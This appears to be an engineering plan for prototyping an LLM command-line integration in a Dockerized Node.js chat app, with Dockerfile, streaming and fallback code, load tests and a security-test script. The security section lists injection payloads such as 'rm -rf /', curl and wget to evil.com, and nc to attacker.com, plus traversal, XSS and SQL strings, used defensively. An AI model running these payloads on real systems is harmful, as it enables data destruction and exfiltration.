LLM CLI Integration Prototyping Plan

Generated: 2025-08-05 UTC
Purpose: Systematic approach to prototype and validate LLM CLI integration for Sasha Studio
Target: Docker-based Node.js application with real-time AI chat streaming

Prototype Objectives

Validate streaming performance - Token-by-token response rendering
Test multi-provider routing - Fallback mechanisms and cost optimization
Verify Docker integration - Container setup and security patterns
Measure error handling - Connection resilience and recovery
Assess scalability - Concurrent request handling

Prototype Architecture

Phase 1: Core Integration Test (Week 1)

Prototype 1A: Basic CLI Streaming

┌─────────────────┐    spawn()    ┌──────────────┐    stdout    ┌─────────────────┐
│  Node.js API    │──────────────►│  AIChat CLI  │─────────────►│  WebSocket      │
│  Server         │               │  Process     │              │  Client         │
└─────────────────┘               └──────────────┘              └─────────────────┘

Validation Criteria:

Token-by-token streaming without blocking
Process cleanup on connection close
Error handling for CLI failures
Memory usage under load

Expected Timeline: 2-3 days

Prototype 1B: Multi-Provider Testing

┌─────────────────┐              ┌──────────────┐
│  Provider Router│──┐           │  OpenAI API  │
│  Logic          │  │           │  (via CLI)   │
└─────────────────┘  │           └──────────────┘
                     │
                     ├──────────►┌──────────────┐
                     │           │  Claude API  │
                     │           │  (via CLI)   │
                     │           └──────────────┘
                     │
                     └──────────►┌──────────────┐
                                 │  Gemini API  │
                                 │  (via CLI)   │
                                 └──────────────┘

Validation Criteria:

Automatic fallback when provider fails
Cost calculation accuracy
Provider-specific error handling
Configuration management

Expected Timeline: 2-3 days

Docker Integration Strategy

Phase 2: Container Architecture (Week 1-2)

Dockerfile Prototype

FROM node:20-alpine AS base

# Install AIChat CLI (most comprehensive alternative to LLxprt)
RUN wget https://github.com/sigoden/aichat/releases/latest/download/aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && tar -xzf aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && mv aichat /usr/local/bin/ \
    && chmod +x /usr/local/bin/aichat \
    && rm aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz

# Create non-root user for security
RUN addgroup -g 1001 -S nodejs && \
    adduser -S nodejs -u 1001

# Setup configuration directory
RUN mkdir -p /app/.config/aichat && \
    chown -R nodejs:nodejs /app

FROM base AS development
WORKDIR /app
USER nodejs

# Copy package files
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --only=development

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["npm", "run", "dev"]

FROM base AS production
WORKDIR /app
USER nodejs

# Copy package files and install production dependencies
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --omit=dev

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["node", "server.js"]

Configuration Management

# .config/aichat/config.yaml
model: openai:gpt-4
temperature: 0.7
stream: true
save: false  # Don't save conversations to avoid disk bloat

clients:
  - type: openai
    api_key: ${OPENAI_API_KEY}
    api_base: https://api.openai.com/v1
  - type: claude
    api_key: ${ANTHROPIC_API_KEY}  
    api_base: https://api.anthropic.com
  - type: gemini
    api_key: ${GOOGLE_API_KEY}
    api_base: https://generativelanguage.googleapis.com

Validation Criteria:

Secure API key management via environment variables
Non-root container execution
Proper file permissions and ownership
Resource limits and health checks

Streaming Implementation Patterns

Phase 3: Real-Time Communication (Week 2)

WebSocket + CLI Integration

// prototype/streaming-integration.js
const { spawn } = require('child_process');
const WebSocket = require('ws');
const express = require('express');

class StreamingLLMService {
    constructor() {
        this.activeStreams = new Map();
    }

    async startStream(sessionId, message, model = 'openai:gpt-4') {
        const startTime = Date.now();
        
        // Spawn CLI process with streaming
        const process = spawn('aichat', [
            '-m', model,
            '--stream',
            '--no-save',
            message
        ], {
            env: { 
                ...process.env, 
                AICHAT_CONFIG_DIR: '/app/.config/aichat' 
            }
        });

        this.activeStreams.set(sessionId, {
            process,
            startTime,
            chunks: 0,
            totalChars: 0
        });

        return process;
    }

    setupWebSocketHandling(wss) {
        wss.on('connection', (ws, req) => {
            const sessionId = req.url.split('session=')[1];
            
            ws.on('message', async (data) => {
                try {
                    const { message, model } = JSON.parse(data);
                    const process = await this.startStream(sessionId, message, model);
                    
                    // Stream stdout to WebSocket
                    process.stdout.on('data', (chunk) => {
                        const streamData = this.activeStreams.get(sessionId);
                        if (streamData) {
                            streamData.chunks++;
                            streamData.totalChars += chunk.length;
                        }
                        
                        ws.send(JSON.stringify({
                            type: 'chunk',
                            content: chunk.toString(),
                            sessionId
                        }));
                    });

                    // Handle completion
                    process.on('close', (code) => {
                        const streamData = this.activeStreams.get(sessionId);
                        const duration = Date.now() - streamData?.startTime || 0;
                        
                        ws.send(JSON.stringify({
                            type: 'complete',
                            sessionId,
                            metadata: {
                                duration,
                                chunks: streamData?.chunks || 0,
                                totalChars: streamData?.totalChars || 0,
                                exitCode: code
                            }
                        }));
                        
                        this.activeStreams.delete(sessionId);
                    });

                    // Error handling
                    process.stderr.on('data', (error) => {
                        ws.send(JSON.stringify({
                            type: 'error',
                            error: error.toString(),
                            sessionId
                        }));
                    });

                } catch (error) {
                    ws.send(JSON.stringify({
                        type: 'error',
                        error: error.message,
                        sessionId
                    }));
                }
            });

            ws.on('close', () => {
                // Cleanup any active processes for this session
                const streamData = this.activeStreams.get(sessionId);
                if (streamData?.process) {
                    streamData.process.kill('SIGTERM');
                    this.activeStreams.delete(sessionId);
                }
            });
        });
    }
}

Provider Fallback Logic

// prototype/provider-router.js
class ProviderRouter {
    constructor() {
        this.providers = {
            'openai': { models: ['gpt-4', 'gpt-3.5-turbo'], priority: 1 },
            'claude': { models: ['claude-3-sonnet', 'claude-3-haiku'], priority: 2 },
            'gemini': { models: ['gemini-pro'], priority: 3 }
        };
        
        this.healthStatus = new Map();
        this.lastHealthCheck = new Map();
    }

    async routeRequest(message, preferredProvider = null) {
        const availableProviders = await this.getHealthyProviders();
        
        if (preferredProvider && availableProviders.includes(preferredProvider)) {
            return this.executeWithProvider(preferredProvider, message);
        }

        // Try providers in priority order
        for (const provider of availableProviders) {
            try {
                return await this.executeWithProvider(provider, message);
            } catch (error) {
                console.warn(`Provider ${provider} failed, trying next:`, error.message);
                this.markProviderUnhealthy(provider);
                continue;
            }
        }

        throw new Error('All providers failed');
    }

    async executeWithProvider(provider, message) {
        const model = `${provider}:${this.providers[provider].models[0]}`;
        
        return new Promise((resolve, reject) => {
            const process = spawn('aichat', ['-m', model, '--stream', message]);
            let response = '';
            
            process.stdout.on('data', (chunk) => {
                response += chunk.toString();
            });
            
            process.on('close', (code) => {
                if (code === 0) {
                    this.markProviderHealthy(provider);
                    resolve({ provider, model, response });
                } else {
                    reject(new Error(`Provider ${provider} exited with code ${code}`));
                }
            });
            
            process.stderr.on('data', (error) => {
                reject(new Error(`Provider ${provider} error: ${error.toString()}`));
            });
        });
    }

    async getHealthyProviders() {
        const healthy = [];
        
        for (const [provider, config] of Object.entries(this.providers)) {
            if (await this.isProviderHealthy(provider)) {
                healthy.push(provider);
            }
        }
        
        return healthy.sort((a, b) => 
            this.providers[a].priority - this.providers[b].priority
        );
    }

    async isProviderHealthy(provider) {
        const lastCheck = this.lastHealthCheck.get(provider) || 0;
        const now = Date.now();
        
        // Cache health status for 5 minutes
        if (now - lastCheck < 5 * 60 * 1000) {
            return this.healthStatus.get(provider) !== false;
        }
        
        try {
            // Quick health check with minimal request
            await this.executeWithProvider(provider, 'test');
            this.healthStatus.set(provider, true);
            this.lastHealthCheck.set(provider, now);
            return true;
        } catch (error) {
            this.healthStatus.set(provider, false);
            this.lastHealthCheck.set(provider, now);
            return false;
        }
    }

    markProviderHealthy(provider) {
        this.healthStatus.set(provider, true);
        this.lastHealthCheck.set(provider, Date.now());
    }

    markProviderUnhealthy(provider) {
        this.healthStatus.set(provider, false);
        this.lastHealthCheck.set(provider, Date.now());
    }
}

Validation Criteria:

Sub-second first token response time
Smooth streaming without UI blocking
Graceful WebSocket reconnection
Automatic provider failover
Memory usage remains stable under load

Performance Testing Strategy

Phase 4: Load Testing (Week 2-3)

Concurrent Stream Testing

// prototype/load-test.js
const WebSocket = require('ws');

async function loadTest() {
    const concurrentConnections = 10;
    const messagesPerConnection = 5;
    const connections = [];
    
    console.log('Starting load test...');
    console.log(`Concurrent connections: ${concurrentConnections}`);
    console.log(`Messages per connection: ${messagesPerConnection}`);
    
    for (let i = 0; i < concurrentConnections; i++) {
        const ws = new WebSocket(`ws://localhost:3000/ws?session=test-${i}`);
        connections.push({
            ws,
            sessionId: `test-${i}`,
            messagesSent: 0,
            responses: [],
            startTime: Date.now()
        });
        
        ws.on('open', () => {
            console.log(`Connection ${i} opened`);
            sendNextMessage(connections[i]);
        });
        
        ws.on('message', (data) => {
            const message = JSON.parse(data);
            const conn = connections[i];
            
            if (message.type === 'complete') {
                conn.responses.push({
                    duration: Date.now() - conn.startTime,
                    chunks: message.metadata.chunks
                });
                
                if (conn.messagesSent < messagesPerConnection) {
                    setTimeout(() => sendNextMessage(conn), 1000);
                } else {
                    ws.close();
                }
            }
        });
    }
    
    function sendNextMessage(conn) {
        conn.messagesSent++;
        conn.startTime = Date.now();
        
        conn.ws.send(JSON.stringify({
            message: `Test message ${conn.messagesSent} for load testing`,
            model: 'openai:gpt-3.5-turbo'
        }));
    }
}

loadTest().catch(console.error);

Memory and Resource Monitoring

// prototype/monitor.js
class SystemMonitor {
    constructor() {
        this.metrics = {
            memoryUsage: [],
            activeProcesses: 0,
            responseTimeHistory: [],
            errorRate: 0
        };
        
        this.startMonitoring();
    }
    
    startMonitoring() {
        setInterval(() => {
            const usage = process.memoryUsage();
            this.metrics.memoryUsage.push({
                timestamp: Date.now(),
                heapUsed: usage.heapUsed / 1024 / 1024, // MB
                heapTotal: usage.heapTotal / 1024 / 1024, // MB
                external: usage.external / 1024 / 1024 // MB
            });
            
            // Keep only last 100 measurements
            if (this.metrics.memoryUsage.length > 100) {
                this.metrics.memoryUsage.shift();
            }
        }, 5000);
    }
    
    recordResponseTime(duration) {
        this.metrics.responseTimeHistory.push(duration);
        if (this.metrics.responseTimeHistory.length > 1000) {
            this.metrics.responseTimeHistory.shift();
        }
    }
    
    getAverageResponseTime() {
        if (this.metrics.responseTimeHistory.length === 0) return 0;
        
        const sum = this.metrics.responseTimeHistory.reduce((a, b) => a + b, 0);
        return sum / this.metrics.responseTimeHistory.length;
    }
    
    getMemoryTrend() {
        if (this.metrics.memoryUsage.length < 2) return 'stable';
        
        const recent = this.metrics.memoryUsage.slice(-10);
        const trend = recent[recent.length - 1].heapUsed - recent[0].heapUsed;
        
        if (trend > 10) return 'increasing';
        if (trend < -10) return 'decreasing';
        return 'stable';
    }
}

Performance Targets:

First Token: < 500ms
Memory Growth: < 5MB/hour under normal load
Concurrent Streams: 10+ simultaneous users
Error Rate: < 1% under normal conditions
CPU Usage: < 50% during streaming

Security Validation

Phase 5: Security Testing (Week 3)

Input Sanitization Testing

// prototype/security-tests.js
const securityTests = [
    // Command injection attempts
    'test; rm -rf /',
    'test && curl evil.com',
    'test | nc attacker.com 1234',
    'test $(wget evil.com)',
    
    // XSS attempts  
    '<script>alert("xss")</script>',
    'javascript:alert(1)',
    
    // Path traversal
    '../../../etc/passwd',
    '..\\..\\windows\\system32',
    
    // SQL injection patterns
    "'; DROP TABLE users; --",
    '1 OR 1=1',
    
    // Extremely long inputs
    'A'.repeat(100000),
    
    // Special characters
    String.fromCharCode(0, 1, 2, 3, 4, 5)
];

async function runSecurityTests() {
    for (const testInput of securityTests) {
        try {
            console.log(`Testing: ${testInput.substring(0, 50)}...`);
            
            const ws = new WebSocket('ws://localhost:3000/ws?session=security-test');
            
            ws.on('open', () => {
                ws.send(JSON.stringify({
                    message: testInput,
                    model: 'openai:gpt-3.5-turbo'
                }));
            });
            
            ws.on('message', (data) => {
                const response = JSON.parse(data);
                if (response.type === 'error') {
                    console.log('✅ Properly rejected malicious input');
                } else {
                    console.log('⚠️  Input was processed - review for security issues');
                }
                ws.close();
            });
            
        } catch (error) {
            console.log('✅ Input properly rejected:', error.message);
        }
        
        await new Promise(resolve => setTimeout(resolve, 100));
    }
}

Security Validation Criteria:

Command injection prevention
Input length limits enforced
Special character handling
Process isolation maintained
API key exposure prevention

Success Metrics & KPIs

Technical Performance

Streaming Latency: First token < 500ms, subsequent tokens < 50ms
Memory Efficiency: < 100MB base usage, < 5MB growth per hour
Error Recovery: < 5 second reconnection time
Process Management: Zero zombie processes after 24h operation

Provider Integration

Fallback Success Rate: > 99% successful fallback when primary fails
Cost Accuracy: ±5% accuracy in cost calculations
Provider Coverage: Support for 3+ major providers (OpenAI, Anthropic, Google)

Security & Reliability

Input Validation: 100% malicious input rejection
Container Security: Non-root execution, minimal privileges
Audit Logging: Complete request/response logging for compliance

Decision Framework

Prototype Success Criteria

PROCEED with full implementation if:

All streaming tests pass performance targets
Provider fallback works reliably
Security validation shows no vulnerabilities
Memory usage remains stable under load
Docker integration is seamless

PIVOT to alternative approach if:

Streaming latency > 1 second consistently
Memory leaks detected in 24h testing
Command injection or security issues found
Provider fallback fails > 5% of time
Docker setup is complex or unreliable

ITERATE prototypes if:

Performance is close but needs optimization
One provider consistently fails
Minor security issues that can be fixed
Docker setup needs refinement

Implementation Timeline

Week 1: Core Prototyping

Days 1-2: Basic CLI streaming integration
Days 3-4: Multi-provider testing and fallback
Days 5-7: Docker container integration and testing

Week 2: Advanced Features

Days 1-3: WebSocket real-time streaming
Days 4-5: Load testing and performance optimization
Days 6-7: Security testing and validation

Week 3: Documentation & Decision

Days 1-2: Create comprehensive integration guide
Days 3-4: Document all patterns and lessons learned
Days 5-7: Final recommendation and next steps

Feedback Loop

After each prototype phase:

Measure against success criteria
Document lessons learned
Identify optimization opportunities
Update implementation approach
Create reusable patterns

This systematic approach ensures we build robust, scalable LLM integration with confidence in our technical decisions.

This prototyping plan provides a comprehensive path from concept to production-ready implementation, with clear validation criteria and decision points along the way.